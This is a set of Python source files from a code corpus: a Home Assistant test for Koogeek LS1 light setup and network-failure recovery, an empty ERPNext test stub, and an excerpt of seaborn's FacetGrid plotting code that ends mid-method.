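    print(pascal_2D_total_row(1, 2.0, 3.0))  # -> [1. 2. 3. 6.]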
|
cbcoutinho/learn_dg
|
tests/helpers.py
|
Python
|
bsd-2-clause
| 4,156
| 0.001444
|
# Copyright (c) 2021, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
# import frappe
import unittest
class TestCampaign(unittest.TestCase):
pass
|
mhbu50/erpnext
|
erpnext/crm/doctype/campaign/test_campaign.py
|
Python
|
gpl-3.0
| 167
| 0.005988
|
"""Make sure that existing Koogeek LS1 support isn't broken."""
from datetime import timedelta
from unittest import mock
from aiohomekit.exceptions import AccessoryDisconnectedError, EncryptionError
from aiohomekit.testing import FakePairing
import pytest
from homeassistant.components.light import SUPPORT_BRIGHTNESS, SUPPORT_COLOR
from homeassistant.helpers import device_registry as dr, entity_registry as er
import homeassistant.util.dt as dt_util
from tests.common import async_fire_time_changed
from tests.components.homekit_controller.common import (
Helper,
setup_accessories_from_file,
setup_test_accessories,
)
LIGHT_ON = ("lightbulb", "on")
async def test_koogeek_ls1_setup(hass):
"""Test that a Koogeek LS1 can be correctly setup in HA."""
accessories = await setup_accessories_from_file(hass, "koogeek_ls1.json")
config_entry, pairing = await setup_test_accessories(hass, accessories)
entity_registry = er.async_get(hass)
# Assert that the entity is correctly added to the entity registry
entry = entity_registry.async_get("light.koogeek_ls1_20833f")
assert entry.unique_id == "homekit-AAAA011111111111-7"
helper = Helper(
hass, "light.koogeek_ls1_20833f", pairing, accessories[0], config_entry
)
state = await helper.poll_and_get_state()
# Assert that the friendly name is detected correctly
assert state.attributes["friendly_name"] == "Koogeek-LS1-20833F"
# Assert that all optional features the LS1 supports are detected
assert state.attributes["supported_features"] == (
SUPPORT_BRIGHTNESS | SUPPORT_COLOR
)
device_registry = dr.async_get(hass)
device = device_registry.async_get(entry.device_id)
assert device.manufacturer == "Koogeek"
assert device.name == "Koogeek-LS1-20833F"
assert device.model == "LS1"
assert device.sw_version == "2.2.15"
assert device.via_device_id is None
@pytest.mark.parametrize("failure_cls", [AccessoryDisconnectedError, EncryptionError])
async def test_recover_from_failure(hass, utcnow, failure_cls):
"""
Test that entity actually recovers from a network connection drop.
See https://github.com/home-assistant/core/issues/18949
"""
accessories = await setup_accessories_from_file(hass, "koogeek_ls1.json")
config_entry, pairing = await setup_test_accessories(hass, accessories)
helper = Helper(
hass, "light.koogeek_ls1_20833f", pairing, accessories[0], config_entry
)
# Set light state on fake device to off
helper.characteristics[LIGHT_ON].set_value(False)
# Test that entity starts off in a known state
state = await helper.poll_and_get_state()
assert state.state == "off"
# Set light state on fake device to on
helper.characteristics[LIGHT_ON].set_value(True)
# Test that entity remains in the same state if there is a network error
next_update = dt_util.utcnow() + timedelta(seconds=60)
with mock.patch.object(FakePairing, "get_characteristics") as get_char:
get_char.side_effect = failure_cls("Disconnected")
state = await helper.poll_and_get_state()
assert state.state == "off"
chars = get_char.call_args[0][0]
assert set(chars) == {(1, 8), (1, 9), (1, 10), (1, 11)}
# Test that entity changes state when network error goes away
next_update += timedelta(seconds=60)
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
state = await helper.poll_and_get_state()
assert state.state == "on"
|
w1ll1am23/home-assistant
|
tests/components/homekit_controller/specific_devices/test_koogeek_ls1.py
|
Python
|
apache-2.0
| 3,555
| 0.000281
|
from itertools import product
from inspect import signature
import warnings
from textwrap import dedent
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from ._core import VectorPlotter, variable_type, categorical_order
from . import utils
from .utils import _check_argument, adjust_legend_subtitles, _draw_figure
from .palettes import color_palette, blend_palette
from ._decorators import _deprecate_positional_args
from ._docstrings import (
DocstringComponents,
_core_docs,
)
__all__ = ["FacetGrid", "PairGrid", "JointGrid", "pairplot", "jointplot"]
_param_docs = DocstringComponents.from_nested_components(
core=_core_docs["params"],
)
class _BaseGrid:
"""Base class for grids of subplots."""
def set(self, **kwargs):
"""Set attributes on each subplot Axes."""
for ax in self.axes.flat:
if ax is not None: # Handle removed axes
ax.set(**kwargs)
return self
@property
def fig(self):
"""DEPRECATED: prefer the `figure` property."""
# Grid.figure is preferred because it matches the Axes attribute name.
# But as the maintanace burden on having this property is minimal,
# let's be slow about formally deprecating it. For now just note its deprecation
# in the docstring; add a warning in version 0.13, and eventually remove it.
return self._figure
@property
def figure(self):
"""Access the :class:`matplotlib.figure.Figure` object underlying the grid."""
return self._figure
def savefig(self, *args, **kwargs):
"""
Save an image of the plot.
This wraps :meth:`matplotlib.figure.Figure.savefig`, using bbox_inches="tight"
by default. Parameters are passed through to the matplotlib function.
"""
kwargs = kwargs.copy()
kwargs.setdefault("bbox_inches", "tight")
self.figure.savefig(*args, **kwargs)
class Grid(_BaseGrid):
"""A grid that can have multiple subplots and an external legend."""
_margin_titles = False
_legend_out = True
def __init__(self):
self._tight_layout_rect = [0, 0, 1, 1]
self._tight_layout_pad = None
# This attribute is set externally and is a hack to handle newer functions that
# don't add proxy artists onto the Axes. We need an overall cleaner approach.
self._extract_legend_handles = False
def tight_layout(self, *args, **kwargs):
"""Call fig.tight_layout within rect that exclude the legend."""
kwargs = kwargs.copy()
kwargs.setdefault("rect", self._tight_layout_rect)
if self._tight_layout_pad is not None:
kwargs.setdefault("pad", self._tight_layout_pad)
self._figure.tight_layout(*args, **kwargs)
def add_legend(self, legend_data=None, title=None, label_order=None,
adjust_subtitles=False, **kwargs):
"""Draw a legend, maybe placing it outside axes and resizing the figure.
Parameters
----------
legend_data : dict
Dictionary mapping label names (or two-element tuples where the
second element is a label name) to matplotlib artist handles. The
default reads from ``self._legend_data``.
title : string
Title for the legend. The default reads from ``self._hue_var``.
label_order : list of labels
The order that the legend entries should appear in. The default
reads from ``self.hue_names``.
adjust_subtitles : bool
If True, modify entries with invisible artists to left-align
the labels and set the font size to that of a title.
kwargs : key, value pairings
Other keyword arguments are passed to the underlying legend methods
on the Figure or Axes object.
Returns
-------
self : Grid instance
Returns self for easy chaining.
"""
# Find the data for the legend
if legend_data is None:
legend_data = self._legend_data
if label_order is None:
if self.hue_names is None:
label_order = list(legend_data.keys())
else:
label_order = list(map(utils.to_utf8, self.hue_names))
blank_handle = mpl.patches.Patch(alpha=0, linewidth=0)
handles = [legend_data.get(l, blank_handle) for l in label_order]
title = self._hue_var if title is None else title
title_size = mpl.rcParams["legend.title_fontsize"]
# Unpack nested labels from a hierarchical legend
labels = []
for entry in label_order:
if isinstance(entry, tuple):
_, label = entry
else:
label = entry
labels.append(label)
# Set default legend kwargs
kwargs.setdefault("scatterpoints", 1)
if self._legend_out:
kwargs.setdefault("frameon", False)
kwargs.setdefault("loc", "center right")
# Draw a full-figure legend outside the grid
figlegend = self._figure.legend(handles, labels, **kwargs)
self._legend = figlegend
figlegend.set_title(title, prop={"size": title_size})
if adjust_subtitles:
adjust_legend_subtitles(figlegend)
# Draw the plot to set the bounding boxes correctly
_draw_figure(self._figure)
# Calculate and set the new width of the figure so the legend fits
legend_width = figlegend.get_window_extent().width / self._figure.dpi
fig_width, fig_height = self._figure.get_size_inches()
self._figure.set_size_inches(fig_width + legend_width, fig_height)
# Draw the plot again to get the new transformations
_draw_figure(self._figure)
# Now calculate how much space we need on the right side
legend_width = figlegend.get_window_extent().width / self._figure.dpi
space_needed = legend_width / (fig_width + legend_width)
margin = .04 if self._margin_titles else .01
self._space_needed = margin + space_needed
right = 1 - self._space_needed
# Place the subplot axes to give space for the legend
self._figure.subplots_adjust(right=right)
self._tight_layout_rect[2] = right
else:
# Draw a legend in the first axis
ax = self.axes.flat[0]
kwargs.setdefault("loc", "best")
leg = ax.legend(handles, labels, **kwargs)
leg.set_title(title, prop={"size": title_size})
self._legend = leg
if adjust_subtitles:
adjust_legend_subtitles(leg)
return self
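    # Illustrative sketch (not part of the original source): after mapping a
    # plot that labels its artists, e.g.
    #
    #     g = FacetGrid(tips, col="time", hue="sex")
    #     g.map(plt.scatter, "total_bill", "tip")
    #     g.add_legend()
    #
    # the legend is drawn outside the axes (legend_out=True by default) and
    # the figure is widened to make room for it. "tips" is an assumed example
    # DataFrame with those columns.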
def _update_legend_data(self, ax):
"""Extract the legend data from an axes object and save it."""
data = {}
# Get data directly from the legend, which is necessary
# for newer functions that don't add labeled proxy artists
if ax.legend_ is not None and self._extract_legend_handles:
handles = ax.legend_.legendHandles
labels = [t.get_text() for t in ax.legend_.texts]
data.update({l: h for h, l in zip(handles, labels)})
handles, labels = ax.get_legend_handles_labels()
data.update({l: h for h, l in zip(handles, labels)})
self._legend_data.update(data)
# Now clear the legend
ax.legend_ = None
def _get_palette(self, data, hue, hue_order, palette):
"""Get a list of colors for the hue variable."""
if hue is None:
palette = color_palette(n_colors=1)
else:
hue_names = categorical_order(data[hue], hue_order)
n_colors = len(hue_names)
# By default use either the current color palette or HUSL
if palette is None:
current_palette = utils.get_color_cycle()
if n_colors > len(current_palette):
colors = color_palette("husl", n_colors)
else:
colors = color_palette(n_colors=n_colors)
# Allow for palette to map from hue variable names
elif isinstance(palette, dict):
color_names = [palette[h] for h in hue_names]
colors = color_palette(color_names, n_colors)
# Otherwise act as if we just got a list of colors
else:
colors = color_palette(palette, n_colors)
palette = color_palette(colors, n_colors)
return palette
@property
def legend(self):
"""The :class:`matplotlib.legend.Legend` object, if present."""
try:
return self._legend
except AttributeError:
return None
_facet_docs = dict(
data=dedent("""\
data : DataFrame
Tidy ("long-form") dataframe where each column is a variable and each
row is an observation.\
"""),
rowcol=dedent("""\
row, col : vectors or keys in ``data``
Variables that define subsets to plot on different facets.\
"""),
rowcol_order=dedent("""\
{row,col}_order : vector of strings
Specify the order in which levels of the ``row`` and/or ``col`` variables
appear in the grid of subplots.\
"""),
col_wrap=dedent("""\
col_wrap : int
"Wrap" the column variable at this width, so that the column facets
span multiple rows. Incompatible with a ``row`` facet.\
"""),
share_xy=dedent("""\
share{x,y} : bool, 'col', or 'row' optional
If true, the facets will share y axes across columns and/or x axes
across rows.\
"""),
height=dedent("""\
height : scalar
Height (in inches) of each facet. See also: ``aspect``.\
"""),
aspect=dedent("""\
aspect : scalar
Aspect ratio of each facet, so that ``aspect * height`` gives the width
of each facet in inches.\
"""),
palette=dedent("""\
palette : palette name, list, or dict
Colors to use for the different levels of the ``hue`` variable. Should
be something that can be interpreted by :func:`color_palette`, or a
dictionary mapping hue levels to matplotlib colors.\
"""),
legend_out=dedent("""\
legend_out : bool
If ``True``, the figure size will be extended, and the legend will be
drawn outside the plot on the center right.\
"""),
margin_titles=dedent("""\
margin_titles : bool
If ``True``, the titles for the row variable are drawn to the right of
the last column. This option is experimental and may not work in all
cases.\
"""),
facet_kws=dedent("""\
facet_kws : dict
Additional parameters passed to :class:`FacetGrid`.
"""),
)
class FacetGrid(Grid):
"""Multi-plot grid for plotting conditional relationships."""
@_deprecate_positional_args
def __init__(
self, data, *,
row=None, col=None, hue=None, col_wrap=None,
sharex=True, sharey=True, height=3, aspect=1, palette=None,
row_order=None, col_order=None, hue_order=None, hue_kws=None,
dropna=False, legend_out=True, despine=True,
margin_titles=False, xlim=None, ylim=None, subplot_kws=None,
gridspec_kws=None, size=None
):
super(FacetGrid, self).__init__()
# Handle deprecations
if size is not None:
height = size
msg = ("The `size` parameter has been renamed to `height`; "
"please update your code.")
warnings.warn(msg, UserWarning)
# Determine the hue facet layer information
hue_var = hue
if hue is None:
hue_names = None
else:
hue_names = categorical_order(data[hue], hue_order)
colors = self._get_palette(data, hue, hue_order, palette)
# Set up the lists of names for the row and column facet variables
if row is None:
row_names = []
else:
row_names = categorical_order(data[row], row_order)
if col is None:
col_names = []
else:
col_names = categorical_order(data[col], col_order)
# Additional dict of kwarg -> list of values for mapping the hue var
hue_kws = hue_kws if hue_kws is not None else {}
# Make a boolean mask that is True anywhere there is an NA
# value in one of the faceting variables, but only if dropna is True
none_na = np.zeros(len(data), bool)
if dropna:
row_na = none_na if row is None else data[row].isnull()
col_na = none_na if col is None else data[col].isnull()
hue_na = none_na if hue is None else data[hue].isnull()
not_na = ~(row_na | col_na | hue_na)
else:
not_na = ~none_na
# Compute the grid shape
ncol = 1 if col is None else len(col_names)
nrow = 1 if row is None else len(row_names)
self._n_facets = ncol * nrow
self._col_wrap = col_wrap
if col_wrap is not None:
if row is not None:
err = "Cannot use `row` and `col_wrap` together."
raise ValueError(err)
ncol = col_wrap
nrow = int(np.ceil(len(col_names) / col_wrap))
self._ncol = ncol
self._nrow = nrow
# Calculate the base figure size
# This can get stretched later by a legend
# TODO this doesn't account for axis labels
figsize = (ncol * height * aspect, nrow * height)
# Validate some inputs
if col_wrap is not None:
margin_titles = False
# Build the subplot keyword dictionary
subplot_kws = {} if subplot_kws is None else subplot_kws.copy()
gridspec_kws = {} if gridspec_kws is None else gridspec_kws.copy()
if xlim is not None:
subplot_kws["xlim"] = xlim
if ylim is not None:
subplot_kws["ylim"] = ylim
# --- Initialize the subplot grid
# Disable autolayout so legend_out works properly
with mpl.rc_context({"figure.autolayout": False}):
fig = plt.figure(figsize=figsize)
if col_wrap is None:
kwargs = dict(squeeze=False,
sharex=sharex, sharey=sharey,
subplot_kw=subplot_kws,
gridspec_kw=gridspec_kws)
axes = fig.subplots(nrow, ncol, **kwargs)
if col is None and row is None:
axes_dict = {}
elif col is None:
axes_dict = dict(zip(row_names, axes.flat))
elif row is None:
axes_dict = dict(zip(col_names, axes.flat))
else:
facet_product = product(row_names, col_names)
axes_dict = dict(zip(facet_product, axes.flat))
else:
# If wrapping the col variable we need to make the grid ourselves
if gridspec_kws:
warnings.warn("`gridspec_kws` ignored when using `col_wrap`")
n_axes = len(col_names)
axes = np.empty(n_axes, object)
axes[0] = fig.add_subplot(nrow, ncol, 1, **subplot_kws)
if sharex:
subplot_kws["sharex"] = axes[0]
if sharey:
subplot_kws["sharey"] = axes[0]
for i in range(1, n_axes):
axes[i] = fig.add_subplot(nrow, ncol, i + 1, **subplot_kws)
axes_dict = dict(zip(col_names, axes))
# --- Set up the class attributes
# Attributes that are part of the public API but accessed through
# a property so that Sphinx adds them to the auto class doc
self._figure = fig
self._axes = axes
self._axes_dict = axes_dict
self._legend = None
# Public attributes that aren't explicitly documented
# (It's not obvious that having them be public was a good idea)
self.data = data
self.row_names = row_names
self.col_names = col_names
self.hue_names = hue_names
self.hue_kws = hue_kws
# Next the private variables
self._nrow = nrow
self._row_var = row
self._ncol = ncol
self._col_var = col
self._margin_titles = margin_titles
self._margin_titles_texts = []
self._col_wrap = col_wrap
self._hue_var = hue_var
self._colors = colors
self._legend_out = legend_out
self._legend_data = {}
self._x_var = None
self._y_var = None
self._sharex = sharex
self._sharey = sharey
self._dropna = dropna
self._not_na = not_na
# --- Make the axes look good
self.set_titles()
self.tight_layout()
if despine:
self.despine()
if sharex in [True, 'col']:
for ax in self._not_bottom_axes:
for label in ax.get_xticklabels():
label.set_visible(False)
ax.xaxis.offsetText.set_visible(False)
ax.xaxis.label.set_visible(False)
if sharey in [True, 'row']:
for ax in self._not_left_axes:
for label in ax.get_yticklabels():
label.set_visible(False)
ax.yaxis.offsetText.set_visible(False)
ax.yaxis.label.set_visible(False)
__init__.__doc__ = dedent("""\
Initialize the matplotlib figure and FacetGrid object.
This class maps a dataset onto multiple axes arrayed in a grid of rows
and columns that correspond to *levels* of variables in the dataset.
The plots it produces are often called "lattice", "trellis", or
"small-multiple" graphics.
It can also represent levels of a third variable with the ``hue``
parameter, which plots different subsets of data in different colors.
This uses color to resolve elements on a third dimension, but only
draws subsets on top of each other and will not tailor the ``hue``
parameter for the specific visualization the way that axes-level
functions that accept ``hue`` will.
The basic workflow is to initialize the :class:`FacetGrid` object with
the dataset and the variables that are used to structure the grid. Then
one or more plotting functions can be applied to each subset by calling
:meth:`FacetGrid.map` or :meth:`FacetGrid.map_dataframe`. Finally, the
plot can be tweaked with other methods to do things like change the
axis labels, use different ticks, or add a legend. See the detailed
code examples below for more information.
.. warning::
When using seaborn functions that infer semantic mappings from a
dataset, care must be taken to synchronize those mappings across
        facets (e.g., by defining the ``hue`` mapping with a palette dict or
setting the data type of the variables to ``category``). In most cases,
it will be better to use a figure-level function (e.g. :func:`relplot`
or :func:`catplot`) than to use :class:`FacetGrid` directly.
See the :ref:`tutorial <grid_tutorial>` for more information.
Parameters
----------
{data}
row, col, hue : strings
Variables that define subsets of the data, which will be drawn on
separate facets in the grid. See the ``{{var}}_order`` parameters to
control the order of levels of this variable.
{col_wrap}
{share_xy}
{height}
{aspect}
{palette}
{{row,col,hue}}_order : lists
Order for the levels of the faceting variables. By default, this
will be the order that the levels appear in ``data`` or, if the
variables are pandas categoricals, the category order.
hue_kws : dictionary of param -> list of values mapping
Other keyword arguments to insert into the plotting call to let
other plot attributes vary across levels of the hue variable (e.g.
the markers in a scatterplot).
{legend_out}
despine : boolean
Remove the top and right spines from the plots.
{margin_titles}
{{x, y}}lim: tuples
Limits for each of the axes on each facet (only relevant when
share{{x, y}} is True).
subplot_kws : dict
Dictionary of keyword arguments passed to matplotlib subplot(s)
methods.
gridspec_kws : dict
Dictionary of keyword arguments passed to
:class:`matplotlib.gridspec.GridSpec`
(via :meth:`matplotlib.figure.Figure.subplots`).
Ignored if ``col_wrap`` is not ``None``.
See Also
--------
PairGrid : Subplot grid for plotting pairwise relationships
relplot : Combine a relational plot and a :class:`FacetGrid`
displot : Combine a distribution plot and a :class:`FacetGrid`
catplot : Combine a categorical plot and a :class:`FacetGrid`
lmplot : Combine a regression plot and a :class:`FacetGrid`
Examples
--------
.. note::
These examples use seaborn functions to demonstrate some of the
advanced features of the class, but in most cases you will want
        to use figure-level functions (e.g. :func:`displot`, :func:`relplot`)
to make the plots shown here.
.. include:: ../docstrings/FacetGrid.rst
""").format(**_facet_docs)
def facet_data(self):
"""Generator for name indices and data subsets for each facet.
Yields
------
(i, j, k), data_ijk : tuple of ints, DataFrame
The ints provide an index into the {row, col, hue}_names attribute,
and the dataframe contains a subset of the full data corresponding
to each facet. The generator yields subsets that correspond with
the self.axes.flat iterator, or self.axes[i, j] when `col_wrap`
is None.
"""
data = self.data
# Construct masks for the row variable
if self.row_names:
row_masks = [data[self._row_var] == n for n in self.row_names]
else:
row_masks = [np.repeat(True, len(self.data))]
# Construct masks for the column variable
if self.col_names:
col_masks = [data[self._col_var] == n for n in self.col_names]
else:
col_masks = [np.repeat(True, len(self.data))]
# Construct masks for the hue variable
if self.hue_names:
hue_masks = [data[self._hue_var] == n for n in self.hue_names]
else:
hue_masks = [np.repeat(True, len(self.data))]
# Here is the main generator loop
for (i, row), (j, col), (k, hue) in product(enumerate(row_masks),
enumerate(col_masks),
enumerate(hue_masks)):
data_ijk = data[row & col & hue & self._not_na]
yield (i, j, k), data_ijk
def map(self, func, *args, **kwargs):
"""Apply a plotting function to each facet's subset of the data.
Parameters
----------
func : callable
A plotting function that takes data and keyword arguments. It
must plot to the currently active matplotlib Axes and take a
`color` keyword argument. If faceting on the `hue` dimension,
it must also take a `label` keyword argument.
args : strings
Column names in self.data that identify variables with data to
plot. The data for each variable is passed to `func` in the
order the variables are specified in the call.
kwargs : keyword arguments
All keyword arguments are passed to the plotting function.
Returns
-------
self : object
Returns self.
"""
# If color was a keyword argument, grab it here
kw_color = kwargs.pop("color", None)
# How we use the function depends on where it comes from
func_module = str(getattr(func, "__module__", ""))
# Check for categorical plots without order information
if func_module == "seaborn.categorical":
if "order" not in kwargs:
warning = ("Using the {} function without specifying "
"`order` is likely to produce an incorrect "
"plot.".format(func.__name__))
warnings.warn(warning)
if len(args) == 3 and "hue_order" not in kwargs:
warning = ("Using the {} function without specifying "
"`hue_order` is likely to produce an incorrect "
"plot.".format(func.__name__))
warnings.warn(warning)
# Iterate over the data subsets
for (row_i, col_j, hue_k), data_ijk in self.facet_data():
# If this subset is null, move on
if not data_ijk.values.size:
continue
# Get the current axis
modify_state = not func_module.startswith("seaborn")
ax = self.facet_axis(row_i, col_j, modify_state)
# Decide what color to plot with
kwargs["color"] = self._facet_color(hue_k, kw_color)
# Insert the other hue aesthetics if appropriate
for kw, val_list in self.hue_kws.items():
kwargs[kw] = val_list[hue_k]
# Insert a label in the keyword arguments for the legend
if self._hue_var is not None:
kwargs["label"] = utils.to_utf8(self.hue_names[hue_k])
# Get the actual data we are going to plot with
plot_data = data_ijk[list(args)]
if self._dropna:
plot_data = plot_data.dropna()
plot_args = [v for k, v in plot_data.iteritems()]
# Some matplotlib functions don't handle pandas objects correctly
if func_module.startswith("matplotlib"):
plot_args = [v.values for v in plot_args]
# Draw the plot
self._facet_plot(func, ax, plot_args, kwargs)
# Finalize the annotations and layout
self._finalize_grid(args[:2])
return self
def map_dataframe(self, func, *args, **kwargs):
"""Like ``.map`` but passes args as strings and inserts data in kwargs.
This method is suitable for plotting with functions that accept a
long-form DataFrame as a `data` keyword argument and access the
data in that DataFrame using string variable names.
Parameters
----------
func : callable
A plotting function that takes data and keyword arguments. Unlike
the `map` method, a function used here must "understand" Pandas
objects. It also must plot to the currently active matplotlib Axes
and take a `color` keyword argument. If faceting on the `hue`
dimension, it must also take a `label` keyword argument.
args : strings
Column names in self.data that identify variables with data to
plot. The data for each variable is passed to `func` in the
order the variables are specified in the call.
kwargs : keyword arguments
All keyword arguments are passed to the plotting function.
Returns
-------
self : object
Returns self.
"""
# If color was a keyword argument, grab it here
kw_color = kwargs.pop("color", None)
# Iterate over the data subsets
for (row_i, col_j, hue_k), data_ijk in self.facet_data():
# If this subset is null, move on
if not data_ijk.values.size:
continue
# Get the current axis
modify_state = not str(func.__module__).startswith("seaborn")
ax = self.facet_axis(row_i, col_j, modify_state)
# Decide what color to plot with
kwargs["color"] = self._facet_color(hue_k, kw_color)
# Insert the other hue aesthetics if appropriate
for kw, val_list in self.hue_kws.items():
kwargs[kw] = val_list[hue_k]
# Insert a label in the keyword arguments for the legend
if self._hue_var is not None:
kwargs["label"] = self.hue_names[hue_k]
# Stick the facet dataframe into the kwargs
if self._dropna:
data_ijk = data_ijk.dropna()
kwargs["data"] = data_ijk
# Draw the plot
self._facet_plot(func, ax, args, kwargs)
# For axis labels, prefer to use positional args for backcompat
# but also extract the x/y kwargs and use if no corresponding arg
axis_labels = [kwargs.get("x", None), kwargs.get("y", None)]
for i, val in enumerate(args[:2]):
axis_labels[i] = val
self._finalize_grid(axis_labels)
return self
def _facet_color(self, hue_index, kw_color):
color = self._colors[hue_index]
if kw_color is not None:
return kw_color
elif color is not None:
return color
def _facet_plot(self, func, ax, plot_args, plot_kwargs):
# Draw the plot
if str(func.__module__).startswith("seaborn"):
plot_kwargs = plot_kwargs.copy()
semantics = ["x", "y", "hue", "size", "style"]
for key, val in zip(semantics, plot_args):
plot_kwargs[key] = val
plot_args = []
plot_kwargs["ax"] = ax
func(*plot_args, **plot_kwargs)
# Sort out the supporting information
self._update_legend_data(ax)
def _finalize_grid(self, axlabels):
"""Finalize the annotations and layout."""
self.set_axis_labels(*axlabels)
self.tight_layout()
def facet_axis(self, row_i, col_j, modify_state=True):
"""Make the axis identified by these indices active and return it."""
# Calculate the actual indices of the axes to plot on
if self._col_wrap is not None:
ax = self.axes.flat[col_j]
else:
ax = self.axes[row_i, col_j]
# Get a reference to the axes object we want, and make it active
if modify_state:
plt.sca(ax)
return ax
def despine(self, **kwargs):
"""Remove axis spines from the facets."""
utils.despine(self._figure, **kwargs)
return self
def set_axis_labels(self, x_var=None, y_var=None, clear_inner=True, **kwargs):
"""Set axis labels on the left column and bottom row of the grid."""
if x_var is not None:
self._x_var = x_var
self.set_xlabels(x_var, clear_inner=clear_inner, **kwargs)
if y_var is not None:
self._y_var = y_var
self.set_ylabels(y_var, clear_inner=clear_inner, **kwargs)
return self
def set_xlabels(self, label=None, clear_inner=True, **kwargs):
"""Label the x axis on the bottom row of the grid."""
if label is None:
label = self._x_var
for ax in self._bottom_axes:
ax.set_xlabel(label, **kwargs)
if clear_inner:
for ax in self._not_bottom_axes:
ax.set_xlabel("")
return self
def set_ylabels(self, label=None, clear_inner=True, **kwargs):
"""Label the y axis on the left column of the grid."""
if label is None:
label = self._y_var
for ax in self._left_axes:
ax.set_ylabel(label, **kwargs)
if clear_inner:
for ax in self._not_left_axes:
ax.set_ylabel("")
return self
def set_xticklabels(self, labels=None, step=None, **kwargs):
"""Set x axis tick labels of the grid."""
for ax in self.axes.flat:
curr_ticks = ax.get_xticks()
ax.set_xticks(curr_ticks)
if labels is None:
curr_labels = [l.get_text() for l in ax.get_xticklabels()]
if step is not None:
xticks = ax.get_xticks()[::step]
curr_labels = curr_labels[::step]
ax.set_xticks(xticks)
ax.set_xticklabels(curr_labels, **kwargs)
else:
ax.set_xticklabels(labels, **kwargs)
return self
def set_yticklabels(self, labels=None, **kwargs):
"""Set y axis tick labels on the left column of the grid."""
for ax in self.axes.flat:
curr_ticks = ax.get_yticks()
ax.set_yticks(curr_ticks)
if labels is None:
curr_labels = [l.get_text() for l in ax.get_yticklabels()]
ax.set_yticklabels(curr_labels, **kwargs)
else:
ax.set_yticklabels(labels, **kwargs)
return self
def set_titles(self, template=None, row_template=None, col_template=None,
**kwargs):
"""Draw titles either above each facet or on the grid margins.
Parameters
----------
template : string
Template for all titles with the formatting keys {col_var} and
{col_name} (if using a `col` faceting variable) and/or {row_var}
and {row_name} (if using a `row` faceting variable).
row_template:
Template for the row variable when titles are drawn on the grid
margins. Must have {row_var} and {row_name} formatting keys.
col_template:
            Template for the column variable when titles are drawn on the grid
margins. Must have {col_var} and {col_name} formatting keys.
Returns
-------
self: object
Returns self.
"""
args = dict(row_var=self._row_var, col_var=self._col_var)
kwargs["size"] = kwargs.pop("size", mpl.rcParams["axes.labelsize"])
# Establish default templates
if row_template is None:
row_template = "{row_var} = {row_name}"
if col_template is None:
col_template = "{col_var} = {col_name}"
if template is None:
if self._row_var is None:
template = col_template
elif self._col_var is None:
template = row_template
else:
template = " | ".join([row_template, col_template])
row_template = utils.to_utf8(row_template)
col_template = utils.to_utf8(col_template)
template = utils.to_utf8(template)
if self._margin_titles:
# Remove any existing title texts
for text in self._margin_titles_texts:
text.remove()
self._margin_titles_texts = []
if self.row_names is not None:
# Draw the row titles on the right edge of the grid
for i, row_name in enumerate(self.row_names):
ax = self.axes[i, -1]
args.update(dict(row_name=row_name))
title = row_template.format(**args)
text = ax.annotate(
title, xy=(1.02, .5), xycoords="axes fraction",
rotation=270, ha="left", va="center",
**kwargs
)
self._margin_titles_texts.append(text)
if self.col_names is not None:
# Draw the column titles as normal titles
for j, col_name in enumerate(self.col_names):
args.update(dict(col_name=col_name))
title = col_template.format(**args)
self.axes[0, j].set_title(title, **kwargs)
return self
# Otherwise title each facet with all the necessary information
if (self._row_var is not None) and (self._col_var is not None):
for i, row_name in enumerate(self.row_names):
for j, col_name in enumerate(self.col_names):
args.update(dict(row_name=row_name, col_name=col_name))
title = template.format(**args)
self.axes[i, j].set_title(title, **kwargs)
elif self.row_names is not None and len(self.row_names):
for i, row_name in enumerate(self.row_names):
args.update(dict(row_name=row_name))
title = template.format(**args)
self.axes[i, 0].set_title(title, **kwargs)
elif self.col_names is not None and len(self.col_names):
for i, col_name in enumerate(self.col_names):
args.update(dict(col_name=col_name))
title = template.format(**args)
# Index the flat array so col_wrap works
self.axes.flat[i].set_title(title, **kwargs)
return self
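    # Illustrative sketch (not part of the original source): the default
    # templates produce titles such as "day = Thur"; passing, e.g.,
    #
    #     g.set_titles(col_template="{col_name}")
    #
    # shows only the level name on each facet.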
def refline(self, *, x=None, y=None, color='.5', linestyle='--', **line_kws):
"""Add a reference line(s) to each facet.
Parameters
----------
x, y : numeric
Value(s) to draw the line(s) at.
color : :mod:`matplotlib color <matplotlib.colors>`
Specifies the color of the reference line(s). Pass ``color=None`` to
use ``hue`` mapping.
linestyle : str
Specifies the style of the reference line(s).
line_kws : key, value mappings
Other keyword arguments are passed to :meth:`matplotlib.axes.Axes.axvline`
when ``x`` is not None and :meth:`matplotlib.axes.Axes.axhline` when ``y``
is not None.
Returns
-------
:class:`FacetGrid` instance
Returns ``self`` for easy method chaining.
"""
line_kws['color'] = color
line_kws['linestyle'] = linestyle
if x is not None:
self.map(plt.axvline, x=x, **line_kws)
if y is not None:
            self.map(plt.axhline, y=y, **line_kws)
        return self
# ------ Properties that are part of the public API and documented by Sphinx
@property
def axes(self):
"""An array of the :class:`matplotlib.axes.Axes` objects in the grid."""
return self._axes
@property
def ax(self):
"""The :class:`matplotlib.axes.Axes` when no faceting variables are assigned."""
if self.axes.shape == (1, 1):
return self.axes[0, 0]
else:
err = (
"Use the `.axes` attribute when facet variables are assigned."
)
raise AttributeError(err)
@property
def axes_dict(self):
"""A mapping of facet names to corresponding :class:`matplotlib.axes.Axes`.
If only one of ``row`` or ``col`` is assigned, each key is a string
representing a level of that variable. If both facet dimensions are
assigned, each key is a ``({row_level}, {col_level})`` tuple.
"""
return self._axes_dict
# ------ Private properties, that require some computation to get
@property
def _inner_axes(self):
"""Return a flat array of the inner axes."""
if self._col_wrap is None:
return self.axes[:-1, 1:].flat
else:
axes = []
n_empty = self._nrow * self._ncol - self._n_facets
for i, ax in enumerate(self.axes):
append = (
i % self._ncol
and i < (self._ncol * (self._nrow - 1))
and i < (self._ncol * (self._nrow - 1) - n_empty)
)
if append:
axes.append(ax)
return np.array(axes, object).flat
@property
def _left_axes(self):
"""Return a flat array of the left column of axes."""
if self._col_wrap is None:
return self.axes[:, 0].flat
else:
axes = []
for i, ax in enumerate(self.axes):
if not i % self._ncol:
axes.append(ax)
return np.array(axes, object).flat
@property
def _not_left_axes(self):
"""Return a flat array of axes that aren't on the left column."""
if self._col_wrap is None:
return self.axes[:, 1:].flat
else:
axes = []
for i, ax in enumerate(self.axes):
if i % self._ncol:
axes.append(ax)
return np.array(axes, object).flat
@property
def _bottom_axes(self):
"""Return a flat array of the bottom row of axes."""
